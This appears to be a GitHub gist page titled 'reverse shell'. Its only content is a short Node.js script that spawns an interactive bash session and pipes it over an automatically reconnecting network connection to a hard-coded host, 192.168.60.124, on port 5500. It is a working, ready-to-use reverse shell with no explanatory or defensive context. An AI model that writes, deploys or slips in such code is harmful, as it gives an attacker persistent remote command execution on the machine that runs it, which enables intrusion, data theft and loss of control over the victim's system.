Skip to content

Instantly share code, notes, and snippets.

@fuckup1337
Created May 17, 2018 10:43
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save fuckup1337/c52f9b097b29f2dad44140d6b96e2b9a to your computer and use it in GitHub Desktop.
Save fuckup1337/c52f9b097b29f2dad44140d6b96e2b9a to your computer and use it in GitHub Desktop.
reverse shell
var spawn = require('child_process').spawn;
var net = require('net');
var reconnect = require('reconnect');
reconnect(function (stream) {
var ps = spawn('bash', [ '-i' ]);
stream.pipe(ps.stdin);
ps.stdout.pipe(stream, { end: false });
ps.stderr.pipe(stream, { end: false });
ps.on('exit', function () { stream.end() });
}).connect(5500, '192.168.60.124');
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment